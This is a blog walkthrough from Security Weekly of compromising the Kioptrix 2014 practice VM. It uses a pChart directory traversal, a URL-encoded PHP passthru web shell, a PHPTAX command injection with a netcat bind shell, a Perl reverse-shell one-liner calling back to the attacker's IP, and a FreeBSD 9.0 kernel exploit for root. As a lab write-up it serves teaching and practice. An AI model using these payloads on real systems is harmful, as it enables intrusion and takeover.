Security Weekly
Content

I didn’t want to do my homework, so… Kioptrix!

Today was one of those days where I was supposed to start doing some school work. I am just not “feeling” natural sciences, and the grass is too wet to mow. That said, I figured it would be a good time to try out the new Kioptrix. Kioptrix is a boot 2 root that targets beginning hackers. I picked up my copy from Vulnhub http://vulnhub.com/ (great community active on freenode).

I imported it into parallels, and all was pretty straight forward, if you use virtual box or workstation 9 or below, you will need to follow the additional instructions.

Using netdiscover, its pretty clear which ip address Is kioptrix.

Netdiscover

I go ahead and run nmap on that ip address to reveal two open ports, port 80 and port 8080, based on the response it looks like port 8080 is now allowing nmap to access it.

nmap results

Lets go ahead and do some directory discovery on port 80

Looks like there isn’t much there…

ZAP-Dir-list

Oh look at that! I should of looked at the source first, should of known….

sourcecode

Lets go to that address,Interesting, we see that there is in fact a web application on this server pchart2.1.3, it gives us the version.

pchart2.x

Lets ask Google….

letsaskgoogle

And in fact Google tells us that there is an exploit!

It looks as though there is a directory traversal bug, lets try it out….

[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

And we append index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

etcpasswd

Looks like our LFI is working! Now what? Well… based on my experience with LFI in my OSCP and OSCE classes, traditionally we can get code execution from php code and log poisoning. Lets see what we can browse to. After gooling “freebsd apache log” and trying one of the locations I get a success with the error log :

apache-errorlog

If you look close, it will show us 404’s as well, so lets try interting a url encoded php script such as :

Url encoded as :

%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%20%3F%3E%0A%0A

Our code shows up in the log, highlighted in blue. It does not execute however.

Lets try the 8080 site:

We keep getting :

[Sun Jun 01 13:54:44 2014] [error] [client 192.168.1.228] client denied by server configuration: /usr/local/www/apache22/data2/
[Sun Jun 01 13:54:44 2014] [error] [client 192.168.1.228] client denied by server configuration: /usr/local/www/apache22/data2/favicon.ico
[Sun Jun 01 13:54:44 2014] [error] [client 192.168.1.228] client denied by server configuration: /usr/local/www/apache22/data2/favicon.icoVirtual Hosts

Using the firefox addon user agent switcher, I quickly changed to Mozilla 4 and refreshed the page:

PHP TAX

This first thing exploit-db tells us is :

The application is prone to a remote code execution vulnerability.
 
—————————————————-
 
drawimage.php, line 63:
 
include (“./files/$_GET[pfilez]”);
 
// makes a png image
$pfilef=str_replace(“.tob”,”.png”,$_GET[pfilez]);
$pfilep=str_replace(“.tob”,”.pdf”,$_GET[pfilez]);
Header(“Content-type: image/png”);
if ($_GET[pdf] == “”) Imagepng($image);
if ($_GET[pdf] == “make”) Imagepng($image,”./data/pdf/$pfilef”);
if ($_GET[pdf] == “make”) exec(“convert ./data/pdf/$pfilef ./data/pdf/$pfilep”);
 
—————————————————-
 
Exploit / Proof of Concept:
 
Bindshell on port 23235 using netcat:
 
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
 
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
 

Interesting, I tried the POC and it seems I get no bind shell at all. I’ve experienced this before, there are many flavors of netcat and sometimes the bind option just doesn’t work.

Same idea as before, lets abuse the php.

echo ‘‘ > cmd.php

http://192.168.1.234:8080/phptax/cmd.php?cmd=ls

It looks as though its working now….

phpcodeexec

Lets get something a little more substantial

Using various perl -v and python -v I found perl was installed. I used this perl one liner:

perl -e ‘use Socket;$i=”192.168.1.228″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

By itself it doesn’t work, but url encoded, it works just fine…

got a shhell

Okay… so not we’ve got a shell.

Now lets get root.

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

Lets again look at exploit-db and see if there is anything we can use.

Looks like there is one for freebsd 9.0, lets try it out.

http://www.exploit-db.com/exploits/28718/

Gcc is installed, so we wont need a staging OS to compile, or any other toolchains. Lets upload this compile it and see how it works.

$ gcc freebsd9.c -o freebsd
$ ls
aprB03fuz
aprXKVLzT
freebsd
freebsd9.c
mysql.sock
vmware-fonts0
$ chmod 777 freebsd
$ ./freebsd
[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!
$ whoami
root

Root

Sweet! All in all, it was a good day of procrastination!

Paul Asadoorian

Paul Asadoorian is currently the Principal Security Researcher for Eclypsium, focused on firmware and supply chain security awareness. Paul’s passion for firmware security extends back many years to the WRT54G hacking days and reverse engineering firmware on IoT devices for fun. Paul and his long-time podcast co-host Larry Pesce co-authored the book “WRTG54G Ultimate Hacking” in 2007, which fueled the firmware hacking fire even more. Paul has worked in technology and information security for over 20 years, holding various security and engineering roles in a lottery company, university, ISP, independent penetration tester, and security product companies such as Tenable. In 2005 Paul founded Security Weekly, a weekly podcast dedicated to hacking and information security. In 2020 Security Weekly was acquired by the Cyberrisk Alliance. Paul is still the host of one of the longest-running security podcasts, Paul’s Security Weekly, he enjoys coding in Python & telling everyone he uses Linux.

Related

DevSecOps Scanning Challenges & Tips

There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […]

It Should Be ‘Cybersecurity Culture Month’

It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […]

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds